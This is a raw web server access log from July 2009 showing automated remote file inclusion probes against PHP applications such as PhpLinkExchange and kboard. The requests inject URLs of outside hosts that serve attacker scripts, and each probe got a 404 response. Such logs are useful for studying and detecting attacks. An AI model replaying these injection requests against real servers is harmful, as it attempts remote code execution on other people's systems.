114.200.199.144 - - [16/Jul/2009:03:01:24 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [16/Jul/2009:03:01:24 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:02:43 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:02:43 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:02:43 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:03:03:04 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:03:03:14 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
